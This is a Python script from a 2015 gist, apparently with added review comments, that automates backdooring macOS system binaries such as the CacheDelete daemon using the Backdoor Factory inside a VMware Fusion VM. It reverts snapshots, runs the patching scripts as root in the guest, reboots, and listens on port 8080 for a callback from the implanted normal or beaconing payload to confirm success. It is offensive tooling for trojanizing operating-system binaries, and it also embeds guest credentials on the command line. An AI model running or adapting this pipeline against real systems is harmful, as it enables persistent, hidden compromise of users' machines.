@secretsquirrel
Created February 5, 2015 14:31
Script to automate the patching of binaries on OS X using vmfusion, python, vmrun, and BDF. Tail the log for additional output.
#!/usr/bin/python
import os
import socket
import logging
import time
# Edit the paths below with your username. This script was not built for public usage.
# Given a list of paths,
# patch each of these, then open a port to listen for a connection.
# Paths of the binaries to process, one run of the main loop per entry.
listofbins = [
    '/System/Library/PrivateFrameworks/CacheDelete.framework/deleted',
]

# Timestamped records go to patching.log. The threshold is INFO, so the
# logging.debug() calls elsewhere in this file are not written.
logging.basicConfig(
    format='%(asctime)s %(message)s',
    level='INFO',
    filename='patching.log',
)

# Shell-escaped path of the VMware Fusion VM definition. A raw string keeps
# each backslash-space pair literal so the shell sees one argument.
_VMX_PATH = r'/Users/YOURUSERNAME/Documents/Virtual\ Machines.localized/OS\ X\ 10.10.vmwarevm/OS\ X\ 10.10.vmx'

# vmrun command lines: roll back to the named snapshot, power on, hard reset.
revert_cmd = 'vmrun -T fusion revertToSnapshot ' + _VMX_PATH + ' "for testing core daemons"'
start_cmd = 'vmrun -T fusion start ' + _VMX_PATH
restart_cmd = 'vmrun -T fusion reset ' + _VMX_PATH
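def socket_test(atimeout):
    """Wait up to ``atimeout`` seconds for one inbound TCP connection on port 8080.

    Args:
        atimeout: socket timeout in seconds, applied to the blocking accept().

    Returns:
        True if a peer connected before the timeout; False on timeout or on
        any bind/listen/accept error (the error text is printed).

    NOTE(review): the listener is bound to 0.0.0.0 and the result does not
    depend on who connected, so any host that can reach port 8080 during the
    window is counted as a success. Run this on an isolated or host-only
    network, and check the printed peer address against the test VM before
    trusting a result.
    """
    # Single-argument print(...) produces the same output on Python 2 and 3.
    print("Listening for %s seconds" % atimeout)
    successful_connection = False
    conn = None  # stays None when accept() times out or bind/listen fails
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR lets the next call rebind the port right after this one closes.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(atimeout)
    try:
        s.bind(('0.0.0.0', 8080))
        s.listen(1)
        conn, addr = s.accept()
        # With the file's logging level of INFO this debug record is not
        # written; the print below is the visible trace of the peer address.
        logging.debug('Connected by %s' % str(addr))
        print('Connected by %s' % (addr,))
        successful_connection = True
    except Exception as e:
        print(str(e))
    finally:
        logging.debug('Attempting to close socket')
        print('Attempting to close socket')
        # Close both sockets on every path. close() is sufficient here:
        # shutdown() requires a "how" argument, and referencing an unset
        # connection must not prevent the listener from being released.
        for sock in (conn, s):
            if sock is None:
                continue
            try:
                sock.close()
            except socket.error:
                pass
    return successful_connection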
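# Command line that runs one of the guest-side scripts through vmrun. The two
# %s slots are the script file name and the binary path appended after the
# closing quote.
# NOTE(review): the guest account and password are passed on the command line
# (-gu/-gp), so they are visible in the host's process list; keep this to a
# disposable snapshot VM. The binary path is interpolated without quoting, so
# entries in listofbins must not contain spaces or shell metacharacters.
_GUEST_SCRIPT_CMD = (
    'vmrun -T fusion -gu test -gp password runScriptInGuest '
    '"/Users/YOURUSERNAME/Documents/Virtual Machines.localized/OS X 10.10.vmwarevm/OS X 10.10.vmx" '
    '-activeWindow -interactive "/bin/bash" '
    '"sudo bash -c \'/Users/test/the-backdoor-factory/%s \'"%s'
)


def _vm_control(cmd):
    """Run a snapshot/power vmrun command; log a warning if it exits non-zero.

    Only used for revert_cmd, start_cmd and restart_cmd, which carry no
    credentials, so the command text is safe to log. Without this check a
    failing vmrun (for example an unedited YOURUSERNAME path) would be
    reported as "No patching" for every binary.
    """
    status = os.system(cmd)
    if status != 0:
        logging.warning('Command exited with status %s: %s' % (status, cmd))
    return status


def _record(handle, message):
    """Log *message* at INFO and append it as one flushed line to *handle*."""
    logging.info(message)
    handle.write(message + '\n')
    handle.flush()  # keep the results file current while the run is in progress


# For each binary: revert the VM, run the normal guest script, reset the VM and
# listen for 60 s. If nothing connects, repeat the cycle with the beaconing
# guest script. "Successful" means only that socket_test() saw a connection.
with open('patching_log', 'w') as f:
    for binary in listofbins:
        normal_patching_script = _GUEST_SCRIPT_CMD % ('automate_testing.py', str(binary))
        beaconing_patching_script = _GUEST_SCRIPT_CMD % ('beaconing_automate_testing.py', str(binary))

        # First attempt: normal payload script.
        _vm_control(revert_cmd)
        _vm_control(start_cmd)
        logging.debug('Attempting normal patching of %s' % binary)
        print("Normal patching %s" % binary)
        time.sleep(5)
        # The guest script's exit status is left unchecked, as before.
        os.system(normal_patching_script)
        _vm_control(restart_cmd)
        if socket_test(60) is True:
            _record(f, 'Successful patching with normal payload of %s' % binary)
            continue
        _record(f, 'No patching with regular payload for %s' % binary)

        # Second attempt, from a clean snapshot: beaconing payload script.
        time.sleep(5)
        logging.debug("Beaconing patching of %s" % binary)
        print("Beaconing patching %s" % binary)
        _vm_control(revert_cmd)
        _vm_control(start_cmd)
        os.system(beaconing_patching_script)
        _vm_control(restart_cmd)
        if socket_test(60) is True:
            _record(f, 'Successful patching with beaconing payload of %s' % binary)
        else:
            _record(f, 'No patching with beaconing payload for %s' % binary)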